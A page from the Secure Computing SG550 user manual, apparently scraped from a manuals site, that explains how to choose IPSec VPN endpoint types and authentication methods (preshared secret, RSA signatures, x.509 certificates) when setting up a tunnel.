Manualshelf

User manual

ManualsBrandsSecure Computing ManualsComputer equipmentSG550
201202203204205206207208209210
Virtual Private Networking
204
3. DNS hostname address to static IP address
4. DNS hostname address to DNS hostname address
5. DNS hostname address to dynamic IP address
Select the type of IPSec endpoint this SG unit has on the interface on which the tunnel is
going out. The SG unit can either have a static IP, dynamic IP or DNS hostname
address. If a dynamic DNS service is to be used or there is a DNS hostname that
resolves to the IP address of the port, then the DNS hostname address option should be
selected. In this example, select dynamic IP address.
Select the type of IPSec endpoint the remote party has. The remote endpoint can have a
static IP address, dynamic IP address or a DNS hostname address. In this example,
select the static IP address option.
Select the type of authentication for the tunnel to use. The SG unit supports the following
types of authentication:
Preshared Secret is a common secret (passphrase) that is shared between the
SG unit and the remote party.
This authentication method is widely supported, relatively simple to configure, and
relatively secure, although it is somewhat less secure when used with aggressive
mode keying.
RSA Digital Signatures uses a public/private RSA key pair for authentication.
The SG unit can generate these key pairs. The public keys need to be
exchanged between the SG unit and the remote party in order to configure the
tunnel.
This authentication method is not widely support, but is relatively secure and
allows dynamic endpoints to be used with main mode keying.
x.509 Certificates are used to authenticate the remote party against a Certificate
Authority's (CA) certificate. The CA certificate must have signed the local
certificates that are used for tunnel authentication. Certificates need to be
uploaded to the SG unit before a tunnel can be configured to use them (see
Certificate Management).
This authentication method is widely supported and very secure, however
differering terminology between vendors can make it difficult to set up a tunnel
between a SG unit and an appliance from another vendor. This authentication
method allows dynamic endpoints to be used with main mode keying.